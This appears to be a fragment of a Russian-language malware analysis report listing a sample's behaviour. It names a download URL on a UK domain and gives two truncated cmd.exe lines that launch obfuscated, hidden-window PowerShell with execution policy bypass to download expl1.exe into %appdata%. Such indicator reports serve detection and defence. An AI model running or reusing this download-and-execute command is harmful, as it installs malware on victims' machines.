Техническая информация
- http://jsmkitchesadbedrooms.co.uk/expl1.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWErsHelL.ExE -EXEcuTIOpoLIcY byPAss -NoProFIlE -WINdOwSTYle hIDdeN (Ew-obJeCt sysTeM.Net.WebCLieT).doWNlOADfILe('http://jsmkitchesadbedrooms.co.uk/expl1.exe','%AppDATa...
- '<SYSTEM32>\cmd.exe' /C "POWErsHelL.ExE -EXEcuTIOpoLIcY byPAss -NoProFIlE -WINdOwSTYle hIDdeN (Ew-obJeCt sysTeM.Net.WebCLieT).doWNlOADfILe('http://jsmkitchesadbedrooms.co.uk/expl1.exe','%AppDATa...' (со скрытым окном)